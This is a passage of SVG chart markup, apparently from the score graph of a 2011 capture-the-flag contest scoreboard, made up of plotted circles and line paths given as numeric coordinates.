stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="61.20528817587642" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="59.2296494355318" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="57.254010695187176" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="55.27837195484255" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="53.30273321449793" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="51.327094474153306" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="49.351455733808685" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="47.375816993464056" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="45.400178253119435" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="43.424539512774814" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="41.44890077243019" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="39.473262032085564" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="37.49762329174094" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="35.52198455139632" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="33.5463458110517" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="31.570707070707076" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="29.59506833036245" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="27.61942959001783" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="25.643790849673206" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="23.668152109328584" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="21.69251336898396" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="19.71687462863934" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="17.741235888294714" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="15.765597147950093" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="13.78995840760547" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="11.814319667260847" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="9.838680926916224" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="7.863042186571599" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="5.887403446226976" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="3.9117647058823533" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.67763809523802 L 75.03475935828877 253.67763809523802 L 77.0103980986334 253.67763809523802 L 78.98603683897802 253.67763809523802 L 80.96167557932264 253.67763809523802 L 82.93731431966727 253.67763809523802 L 84.91295306001189 253.67763809523802 L 86.88859180035651 253.67763809523802 L 88.86423054070113 253.67763809523802 L 90.83986928104575 253.67763809523802 L 92.81550802139039 253.67763809523802 L 94.791146761735 253.67763809523802 L 96.76678550207963 253.67763809523802 L 98.74242424242425 253.67763809523802 L 100.71806298276887 253.67763809523802 L 102.69370172311349 253.67763809523802 L 104.66934046345811 253.67763809523802 L 106.64497920380273 253.67763809523802 L 108.62061794414737 253.67763809523802 L 110.59625668449199 253.67763809523802 L 112.57189542483661 253.67763809523802 L 114.54753416518123 253.67763809523802 L 116.52317290552585 253.67763809523802 L 118.49881164587048 253.67763809523802 L 120.4744503862151 253.67763809523802 L 122.45008912655972 253.67763809523802 L 124.42572786690435 253.67763809523802 L 126.40136660724897 253.67763809523802 L 128.3770053475936 253.67763809523802 L 130.35264408793822 253.67763809523802 L 132.32828282828285 253.67763809523802 L 134.3039215686275 253.67763809523802 L 136.2795603089721 253.67763809523802 L 138.25519904931673 253.67763809523802 L 140.23083778966134 253.67763809523802 L 142.20647653000597 253.67763809523802 L 144.18211527035058 253.67763809523802 L 146.15775401069521 253.67763809523802 L 148.13339275103985 253.67763809523802 L 150.10903149138446 253.67763809523802 L 152.0846702317291 253.46096609523804 L 154.0603089720737 253.46096609523804 L 156.03594771241833 253.46096609523804 L 158.01158645276294 253.46096609523804 L 159.98722519310758 253.46096609523804 L 161.96286393345218 253.46096609523804 L 163.93850267379682 253.46096609523804 L 165.91414141414145 253.46096609523804 L 167.88978015448606 253.46096609523804 L 169.8654188948307 253.46096609523804 L 171.8410576351753 253.46096609523804 L 173.81669637551994 253.46096609523804 L 175.79233511586455 253.46096609523804 L 177.76797385620918 253.46096609523804 L 179.74361259655382 253.46096609523804 L 181.71925133689842 253.46096609523804 L 183.69489007724306 253.46096609523804 L 185.67052881758767 253.46096609523804 L 187.6461675579323 253.46096609523804 L 189.6218062982769 253.46096609523804 L 191.59744503862154 253.46096609523804 L 193.57308377896615 253.46096609523804 L 195.5487225193108 253.46096609523804 L 197.52436125965542 253.46096609523804 L 199.50000000000003 253.46096609523804 L 201.47563874034466 253.46096609523804 L 203.45127748068927 253.46096609523804 L 205.4269162210339 253.3409592380952 L 207.4025549613785 253.28743172571427 L 209.37819370172315 253.24724338285714 L 211.35383244206778 253.24724338285714 L 213.3294711824124 252.99474692571428 L 215.30510992275703 251.61509938285712 L 217.28074866310163 250.48982578285714 L 219.25638740344627 247.72474601142858 L 221.23202614379088 234.42478944 L 223.2076648841355 221.61171058285714 L 225.18330362448012 212.08829115428574 L 227.15894236482475 202.80387058285714 L 229.1345811051694 196.03578829714286 L 231.110219845514 187.72537686857143 L 233.08585858585863 176.89837344 L 235.06149732620324 171.01524658285715 L 237.03713606654787 169.62399922285715 L 239.01277480689248 169.62399922285715 L 240.98841354723712 169.5674119161904 L 242.96405228758175 168.62849991619038 L 244.93969102792636 168.62849991619038 L 246.915329768271 167.9460124342859 L 248.8909685086156 167.79926578285716 L 250.86660724896024 165.97237069714288 L 252.84224598930484 165.5128264685711 L 254.81788472964945 165.5128264685711 L 256.79352346999406 165.5128264685711 L 258.7691622103387 165.5128264685711 L 260.7448009506833 165.39585516190448 L 262.72043969102793 164.46915865904734 L 264.69607843137254 163.72828249904734 L 266.6717171717172 163.5307439390475 L 268.6473559120618 163.5307439390475 L 270.6229946524064 163.5307439390475 L 272.598633392751 163.5307439390475 L 274.5742721330957 163.5307439390475 L 276.5499108734403 163.5307439390475 L 278.5255496137849 163.5307439390475 L 280.50118835412957 163.5307439390475 L 282.4768270944742 163.5307439390475 L 284.4524658348188 163.5307439390475 L 286.4281045751634 163.5307439390475 L 288.40374331550805 163.5307439390475 L 290.37938205585266 163.5307439390475 L 292.35502079619727 163.50232793904752 L 294.33065953654193 161.72835765333323 L 296.30629827688654 161.1528829104761 L 298.28193701723114 158.30970988190467 L 300.25757575757575 155.5378813104761 L 302.2332144979204 151.96977045333324 L 304.208853238265 150.2266089752384 L 306.1844919786096 148.96361362285666 L 308.1601307189543 146.31711990857093 L 310.1357694592989 143.8973452799995 L 312.1114081996435 142.40965097142808 L 314.0870469399881 140.74403134476148 L 316.0626856803328 140.74403134476148 L 318.0383244206774 140.74403134476148 L 320.013963161022 140.74403134476148 L 321.98960190136665 140.74403134476148 L 323.96524064171126 140.74403134476148 L 325.94087938205587 140.74403134476148 L 327.9165181224005 138.7463865447615 L 329.89215686274514 136.84611728761863 L 331.86779560308975 135.05119020190435 L 333.84343434343435 134.13172963047577 L 335.81907308377896 133.22144336761863 L 337.7947118241236 132.39389164190382 L 339.77035056446823 131.7632582857133 L 341.74598930481284 130.97254023618973 L 343.7216280451575 129.97807326476112 L 345.6972667855021 129.4970456380945 L 347.6729055258467 128.3369624380945 L 349.6485442661913 127.31116175238074 L 351.624183006536 126.8695055085712 L 353.5998217468806 126.6549579428569 L 355.5754604872252 126.24255608380903 L 357.55109922756986 125.94201628952334 L 359.52673796791447 125.56161400380904 L 361.5023767082591 125.15929644190473 L 363.4780154486037 124.89065473523794 L 365.45365418894835 124.64328330666652 L 367.42929292929296 124.60776330666653 L 369.40493166963756 124.60776330666653 L 371.3805704099822 124.60776330666653 L 373.35620915032683 124.60776330666653 L 375.33184789067144 124.60776330666653 L 377.30748663101605 124.60776330666653 L 379.2831253713607 124.60776330666653 L 381.2587641117053 124.60776330666653 L 383.2344028520499 124.60776330666653 L 385.2100415923946 124.60776330666653 L 387.1856803327392 124.60776330666653 L 389.1613190730838 124.60776330666653 L 391.1369578134284 124.60776330666653 L 393.1125965537731 124.56621054476187 L 395.0882352941177 124.56621054476187" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.67763809523802 L 75.03475935828877 253.67763809523802 L 77.0103980986334 253.67763809523802 L 78.98603683897802 253.67763809523802 L 80.96167557932264 253.67763809523802 L 82.93731431966727 253.67763809523802 L 84.91295306001189 253.67763809523802 L 86.88859180035651 253.67763809523802 L 88.86423054070113 253.67763809523802 L 90.83986928104575 253.67763809523802 L 92.81550802139039 253.67763809523802 L 94.791146761735 253.67763809523802 L 96.76678550207963 253.67763809523802 L 98.74242424242425 253.67763809523802 L 100.71806298276887 253.67763809523802 L 102.69370172311349 253.67763809523802 L 104.66934046345811 253.67763809523802 L 106.64497920380273 253.67763809523802 L 108.62061794414737 253.67763809523802 L 110.59625668449199 253.67763809523802 L 112.57189542483661 253.67763809523802 L 114.54753416518123 253.67763809523802 L 116.52317290552585 253.67763809523802 L 118.49881164587048 253.67763809523802 L 120.4744503862151 253.67763809523802 L 122.45008912655972 253.67763809523802 L 124.42572786690435 253.67763809523802 L 126.40136660724897 253.67763809523802 L 128.3770053475936 253.67763809523802 L 130.35264408793822 253.67763809523802 L 132.32828282828285 253.67763809523802 L 134.3039215686275 253.67763809523802 L 136.2795603089721 253.67763809523802 L 138.25519904931673 253.67763809523802 L 140.23083778966134 253.67763809523802 L 142.20647653000597 253.67763809523802 L 144.18211527035058 253.67763809523802 L 146.15775401069521 253.67763809523802 L 148.13339275103985 253.67763809523802 L 150.10903149138446 253.67763809523802 L 152.0846702317291 253.46096609523804 L 154.0603089720737 253.46096609523804 L 156.03594771241833 253.46096609523804 L 158.01158645276294 253.46096609523804 L 159.98722519310758 253.46096609523804 L 161.96286393345218 253.46096609523804 L 163.93850267379682 253.46096609523804 L 165.91414141414145 253.46096609523804 L 167.88978015448606 253.46096609523804 L 169.8654188948307 253.46096609523804 L 171.8410576351753 253.46096609523804 L 173.81669637551994 253.46096609523804 L 175.79233511586455 253.46096609523804 L 177.76797385620918 253.46096609523804 L 179.74361259655382 253.46096609523804 L 181.71925133689842 253.46096609523804 L 183.69489007724306 253.46096609523804 L 185.67052881758767 253.46096609523804 L 187.6461675579323 253.46096609523804 L 189.6218062982769 253.46096609523804 L 191.59744503862154 253.46096609523804 L 193.57308377896615 253.46096609523804 L 195.5487225193108 253.46096609523804 L 197.52436125965542 253.46096609523804 L 199.50000000000003 253.46096609523804 L 201.47563874034466 253.46096609523804 L 203.45127748068927 253.46096609523804 L 205.4269162210339 253.3409592380952 L 207.4025549613785 253.28743172571427 L 209.37819370172315 253.24724338285714 L 211.35383244206778 253.24724338285714 L 213.3294711824124 252.99474692571428 L 215.30510992275703 251.61509938285712 L 217.28074866310163 250.48982578285714 L 219.25638740344627 247.72474601142858 L 221.23202614379088 234.42478944 L 223.2076648841355 221.61171058285714 L 225.18330362448012 212.08829115428574 L 227.15894236482475 202.80387058285714 L 229.1345811051694 196.03578829714286 L 231.110219845514 187.72537686857143 L 233.08585858585863 176.89837344 L 235.06149732620324 171.01524658285715 L 237.03713606654787 169.62399922285715 L 239.01277480689248 169.62399922285715 L 240.98841354723712 169.5674119161904 L 242.96405228758175 168.62849991619038 L 244.93969102792636 168.62849991619038 L 246.915329768271 167.9460124342859 L 248.8909685086156 167.79926578285716 L 250.86660724896024 165.97237069714288 L 252.84224598930484 165.5128264685711 L 254.81788472964945 165.5128264685711 L 256.79352346999406 165.5128264685711 L 258.7691622103387 165.5128264685711 L 260.7448009506833 165.39585516190448 L 262.72043969102793 164.46915865904734 L 264.69607843137254 163.72828249904734 L 266.6717171717172 163.5307439390475 L 268.6473559120618 163.5307439390475 L 270.6229946524064 163.5307439390475 L 272.598633392751 163.5307439390475 L 274.5742721330957 163.5307439390475 L 276.5499108734403 163.5307439390475 L 278.5255496137849 163.5307439390475 L 280.50118835412957 163.5307439390475 L 282.4768270944742 163.5307439390475 L 284.4524658348188 163.5307439390475 L 286.4281045751634 163.5307439390475 L 288.40374331550805 163.5307439390475 L 290.37938205585266 163.5307439390475 L 292.35502079619727 163.50232793904752 L 294.33065953654193 161.72835765333323 L 296.30629827688654 161.1528829104761 L 298.28193701723114 158.30970988190467 L 300.25757575757575 155.5378813104761 L 302.2332144979204 151.96977045333324 L 304.208853238265 150.2266089752384 L 306.1844919786096 148.96361362285666 L 308.1601307189543 146.31711990857093 L 310.1357694592989 143.8973452799995 L 312.1114081996435 142.40965097142808 L 314.0870469399881 140.74403134476148 L 316.0626856803328 140.74403134476148 L 318.0383244206774 140.74403134476148 L 320.013963161022 140.74403134476148 L 321.98960190136665 140.74403134476148 L 323.96524064171126 140.74403134476148 L 325.94087938205587 140.74403134476148 L 327.9165181224005 138.7463865447615 L 329.89215686274514 136.84611728761863 L 331.86779560308975 135.05119020190435 L 333.84343434343435 134.13172963047577 L 335.81907308377896 133.22144336761863 L 337.7947118241236 132.39389164190382 L 339.77035056446823 131.7632582857133 L 341.74598930481284 130.97254023618973 L 343.7216280451575 129.97807326476112 L 345.6972667855021 129.4970456380945 L 347.6729055258467 128.3369624380945 L 349.6485442661913 127.31116175238074 L 351.624183006536 126.8695055085712 L 353.5998217468806 126.6549579428569 L 355.5754604872252 126.24255608380903 L 357.55109922756986 125.94201628952334 L 359.52673796791447 125.56161400380904 L 361.5023767082591 125.15929644190473 L 363.4780154486037 124.89065473523794 L 365.45365418894835 124.64328330666652 L 367.42929292929296 124.60776330666653 L 369.40493166963756 124.60776330666653 L 371.3805704099822 124.60776330666653 L 373.35620915032683 124.60776330666653 L 375.33184789067144 124.60776330666653 L 377.30748663101605 124.60776330666653 L 379.2831253713607 124.60776330666653 L 381.2587641117053 124.60776330666653 L 383.2344028520499 124.60776330666653 L 385.2100415923946 124.60776330666653 L 387.1856803327392 124.60776330666653 L 389.1613190730838 124.60776330666653 L 391.1369578134284 124.60776330666653 L 393.1125965537731 124.56621054476187 L 395.0882352941177 124.56621054476187" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.67763809523802 L 75.03475935828877 253.67763809523802 L 77.0103980986334 253.67763809523802 L 78.98603683897802 253.67763809523802 L 80.96167557932264 253.67763809523802 L 82.93731431966727 253.67763809523802 L 84.91295306001189 253.67763809523802 L 86.88859180035651 253.67763809523802 L 88.86423054070113 253.67763809523802 L 90.83986928104575 253.67763809523802 L 92.81550802139039 253.67763809523802 L 94.791146761735 253.67763809523802 L 96.76678550207963 253.67763809523802 L 98.74242424242425 253.67763809523802 L 100.71806298276887 253.67763809523802 L 102.69370172311349 253.67763809523802 L 104.66934046345811 253.67763809523802 L 106.64497920380273 253.67763809523802 L 108.62061794414737 253.67763809523802 L 110.59625668449199 253.67763809523802 L 112.57189542483661 253.67763809523802 L 114.54753416518123 253.67763809523802 L 116.52317290552585 253.67763809523802 L 118.49881164587048 253.67763809523802 L 120.4744503862151 253.67763809523802 L 122.45008912655972 253.67763809523802 L 124.42572786690435 253.67763809523802 L 126.40136660724897 253.67763809523802 L 128.3770053475936 253.67763809523802 L 130.35264408793822 253.67763809523802 L 132.32828282828285 253.67763809523802 L 134.3039215686275 253.67763809523802 L 136.2795603089721 253.67763809523802 L 138.25519904931673 253.67763809523802 L 140.23083778966134 253.67763809523802 L 142.20647653000597 253.67763809523802 L 144.18211527035058 253.67763809523802 L 146.15775401069521 253.67763809523802 L 148.13339275103985 253.67763809523802 L 150.10903149138446 253.67763809523802 L 152.0846702317291 253.46096609523804 L 154.0603089720737 253.46096609523804 L 156.03594771241833 253.46096609523804 L 158.01158645276294 253.46096609523804 L 159.98722519310758 253.46096609523804 L 161.96286393345218 253.46096609523804 L 163.93850267379682 253.46096609523804 L 165.91414141414145 253.46096609523804 L 167.88978015448606 253.46096609523804 L 169.8654188948307 253.46096609523804 L 171.8410576351753 253.46096609523804 L 173.81669637551994 253.46096609523804 L 175.79233511586455 253.46096609523804 L 177.76797385620918 253.46096609523804 L 179.74361259655382 253.46096609523804 L 181.71925133689842 253.46096609523804 L 183.69489007724306 253.46096609523804 L 185.67052881758767 253.46096609523804 L 187.6461675579323 253.46096609523804 L 189.6218062982769 253.46096609523804 L 191.59744503862154 253.46096609523804 L 193.57308377896615 253.46096609523804 L 195.5487225193108 253.46096609523804 L 197.52436125965542 253.46096609523804 L 199.50000000000003 253.46096609523804 L 201.47563874034466 253.46096609523804 L 203.45127748068927 253.46096609523804 L 205.4269162210339 253.3409592380952 L 207.4025549613785 253.28743172571427 L 209.37819370172315 253.24724338285714 L 211.35383244206778 253.24724338285714 L 213.3294711824124 252.99474692571428 L 215.30510992275703 251.61509938285712 L 217.28074866310163 250.48982578285714 L 219.25638740344627 247.72474601142858 L 221.23202614379088 234.42478944 L 223.2076648841355 221.61171058285714 L 225.18330362448012 212.08829115428574 L 227.15894236482475 202.80387058285714 L 229.1345811051694 196.03578829714286 L 231.110219845514 187.72537686857143 L 233.08585858585863 176.89837344 L 235.06149732620324 171.01524658285715 L 237.03713606654787 169.62399922285715 L 239.01277480689248 169.62399922285715 L 240.98841354723712 169.5674119161904 L 242.96405228758175 168.62849991619038 L 244.93969102792636 168.62849991619038 L 246.915329768271 167.9460124342859 L 248.8909685086156 167.79926578285716 L 250.86660724896024 165.97237069714288 L 252.84224598930484 165.5128264685711 L 254.81788472964945 165.5128264685711 L 256.79352346999406 165.5128264685711 L 258.7691622103387 165.5128264685711 L 260.7448009506833 165.39585516190448 L 262.72043969102793 164.46915865904734 L 264.69607843137254 163.72828249904734 L 266.6717171717172 163.5307439390475 L 268.6473559120618 163.5307439390475 L 270.6229946524064 163.5307439390475 L 272.598633392751 163.5307439390475 L 274.5742721330957 163.5307439390475 L 276.5499108734403 163.5307439390475 L 278.5255496137849 163.5307439390475 L 280.50118835412957 163.5307439390475 L 282.4768270944742 163.5307439390475 L 284.4524658348188 163.5307439390475 L 286.4281045751634 163.5307439390475 L 288.40374331550805 163.5307439390475 L 290.37938205585266 163.5307439390475 L 292.35502079619727 163.50232793904752 L 294.33065953654193 161.72835765333323 L 296.30629827688654 161.1528829104761 L 298.28193701723114 158.30970988190467 L 300.25757575757575 155.5378813104761 L 302.2332144979204 151.96977045333324 L 304.208853238265 150.2266089752384 L 306.1844919786096 148.96361362285666 L 308.1601307189543 146.31711990857093 L 310.1357694592989 143.8973452799995 L 312.1114081996435 142.40965097142808 L 314.0870469399881 140.74403134476148 L 316.0626856803328 140.74403134476148 L 318.0383244206774 140.74403134476148 L 320.013963161022 140.74403134476148 L 321.98960190136665 140.74403134476148 L 323.96524064171126 140.74403134476148 L 325.94087938205587 140.74403134476148 L 327.9165181224005 138.7463865447615 L 329.89215686274514 136.84611728761863 L 331.86779560308975 135.05119020190435 L 333.84343434343435 134.13172963047577 L 335.81907308377896 133.22144336761863 L 337.7947118241236 132.39389164190382 L 339.77035056446823 131.7632582857133 L 341.74598930481284 130.97254023618973 L 343.7216280451575 129.97807326476112 L 345.6972667855021 129.4970456380945 L 347.6729055258467 128.3369624380945 L 349.6485442661913 127.31116175238074 L 351.624183006536 126.8695055085712 L 353.5998217468806 126.6549579428569 L 355.5754604872252 126.24255608380903 L 357.55109922756986 125.94201628952334 L 359.52673796791447 125.56161400380904 L 361.5023767082591 125.15929644190473 L 363.4780154486037 124.89065473523794 L 365.45365418894835 124.64328330666652 L 367.42929292929296 124.60776330666653 L 369.40493166963756 124.60776330666653 L 371.3805704099822 124.60776330666653 L 373.35620915032683 124.60776330666653 L 375.33184789067144 124.60776330666653 L 377.30748663101605 124.60776330666653 L 379.2831253713607 124.60776330666653 L 381.2587641117053 124.60776330666653 L 383.2344028520499 124.60776330666653 L 385.2100415923946 124.60776330666653 L 387.1856803327392 124.60776330666653 L 389.1613190730838 124.60776330666653 L 391.1369578134284 124.60776330666653 L 393.1125965537731 124.56621054476187 L 395.0882352941177 124.56621054476187" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.67763809523802 L 75.03475935828877 253.67763809523802 L 77.0103980986334 253.67763809523802 L 78.98603683897802 253.67763809523802 L 80.96167557932264 253.67763809523802 L 82.93731431966727 253.67763809523802 L 84.91295306001189 253.67763809523802 L 86.88859180035651 253.67763809523802 L 88.86423054070113 253.67763809523802 L 90.83986928104575 253.67763809523802 L 92.81550802139039 253.67763809523802 L 94.791146761735 253.67763809523802 L 96.76678550207963 253.67763809523802 L 98.74242424242425 253.67763809523802 L 100.71806298276887 253.67763809523802 L 102.69370172311349 253.67763809523802 L 104.66934046345811 253.67763809523802 L 106.64497920380273 253.67763809523802 L 108.62061794414737 253.67763809523802 L 110.59625668449199 253.67763809523802 L 112.57189542483661 253.67763809523802 L 114.54753416518123 253.67763809523802 L 116.52317290552585 253.67763809523802 L 118.49881164587048 253.67763809523802 L 120.4744503862151 253.67763809523802 L 122.45008912655972 253.67763809523802 L 124.42572786690435 253.67763809523802 L 126.40136660724897 253.67763809523802 L 128.3770053475936 253.67763809523802 L 130.35264408793822 253.67763809523802 L 132.32828282828285 253.67763809523802 L 134.3039215686275 253.67763809523802 L 136.2795603089721 253.67763809523802 L 138.25519904931673 253.67763809523802 L 140.23083778966134 253.67763809523802 L 142.20647653000597 253.67763809523802 L 144.18211527035058 253.67763809523802 L 146.15775401069521 253.67763809523802 L 148.13339275103985 253.67763809523802 L 150.10903149138446 253.67763809523802 L 152.0846702317291 253.46096609523804 L 154.0603089720737 253.46096609523804 L 156.03594771241833 253.46096609523804 L 158.01158645276294 253.46096609523804 L 159.98722519310758 253.46096609523804 L 161.96286393345218 253.46096609523804 L 163.93850267379682 253.46096609523804 L 165.91414141414145 253.46096609523804 L 167.88978015448606 253.46096609523804 L 169.8654188948307 253.46096609523804 L 171.8410576351753 253.46096609523804 L 173.81669637551994 253.46096609523804 L 175.79233511586455 253.46096609523804 L 177.76797385620918 253.46096609523804 L 179.74361259655382 253.46096609523804 L 181.71925133689842 253.46096609523804 L 183.69489007724306 253.46096609523804 L 185.67052881758767 253.46096609523804 L 187.6461675579323 253.46096609523804 L 189.6218062982769 253.46096609523804 L 191.59744503862154 253.46096609523804 L 193.57308377896615 253.46096609523804 L 195.5487225193108 253.46096609523804 L 197.52436125965542 253.46096609523804 L 199.50000000000003 253.46096609523804 L 201.47563874034466 253.46096609523804 L 203.45127748068927 253.46096609523804 L 205.4269162210339 253.3409592380952 L 207.4025549613785 253.28743172571427 L 209.37819370172315 253.24724338285714 L 211.35383244206778 253.24724338285714 L 213.3294711824124 252.99474692571428 L 215.30510992275703 251.61509938285712 L 217.28074866310163 250.48982578285714 L 219.25638740344627 247.72474601142858 L 221.23202614379088 234.42478944 L 223.2076648841355 221.61171058285714 L 225.18330362448012 212.08829115428574 L 227.15894236482475 202.80387058285714 L 229.1345811051694 196.03578829714286 L 231.110219845514 187.72537686857143 L 233.08585858585863 176.89837344 L 235.06149732620324 171.01524658285715 L 237.03713606654787 169.62399922285715 L 